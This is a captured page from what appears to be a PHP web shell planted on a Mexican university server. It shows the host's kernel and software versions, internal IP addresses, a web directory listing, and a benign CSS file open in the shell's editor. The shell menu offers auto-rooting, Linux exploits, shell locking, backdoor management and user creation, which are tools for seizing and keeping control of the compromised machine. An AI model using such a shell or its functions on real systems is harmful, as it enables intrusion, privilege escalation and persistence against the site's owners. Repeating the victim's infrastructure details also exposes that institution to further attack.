Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
Reglamentos_UTP /
[ HOME SHELL ]
Name
Size
Permission
Action
files
[ DIR ]
drwxrwxr-x
index.php
3.3
KB
-rw-rw-r--
list_files.php
1021
B
-rw-rw-r--
styles.css
2.58
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : styles.css
/* Estilos generales */ body { font-family: 'Poppins', sans-serif; margin: 0; padding: 20px; background-color: #f0f2f5; color: #333; display: flex; flex-direction: column; padding-left: 50px; align-items: flex-start; } /* Contenedor principal */ .container { max-width: 1100px; /* Aumenta el ancho para mejor visibilidad */ background: white; padding: 20px; border-radius: 12px; box-shadow: 0px 4px 15px rgba(0, 0, 0, 0.1); margin-top: 20px; margin-left: 0; } /* Título */ h2 { text-align: center; color: green; font-size: 26px; /* Aumenta el tamaño del título */ margin-bottom: 20px; } /* Lista de archivos y carpetas */ ul { list-style-type: none; padding: 0; margin: 0; } li { cursor: pointer; padding: 14px; /* Aumenta el padding para mejor legibilidad */ margin: 8px 0; border-radius: 8px; transition: background 0.3s, transform 0.2s; display: flex; align-items: center; justify-content: space-between; color: green; background: #e8f5e9; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1); font-size: 16px; /* Aumenta el tamaño de la fuente */ } li:hover { background: #c8e6c9; transform: scale(1.02); } /* Carpetas */ .folder { font-weight: bold; color: #1b5e20; } .folder:hover { background-color: #a5d6a7; } /* Archivos */ .file { color: #388e3c; } .file:hover { background-color: #81c784; } /* Botón de descarga */ button { background: #43a047; color: white; border: none; padding: 10px 16px; /* Aumenta el tamaño del botón */ border-radius: 6px; cursor: pointer; transition: background 0.3s, transform 0.2s; font-size: 16px; /* Aumenta el tamaño del texto del botón */ margin-left: 10px; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2); } button:hover { background: #2e7d32; transform: scale(1.05); } /* Visor de archivos */ iframe { width: 100%; height: 600px; /* Aumenta la altura del visor */ display: none; border: 1px solid #ddd; margin-top: 20px; border-radius: 10px; box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1); } /* Estilos responsivos */ @media (max-width: 600px) { .container { padding: 15px; max-width: 100%; } li { font-size: 14px; padding: 12px; } button { font-size: 14px; padding: 8px 14px; margin-left: 8px; } iframe { height: 400px; } }
Close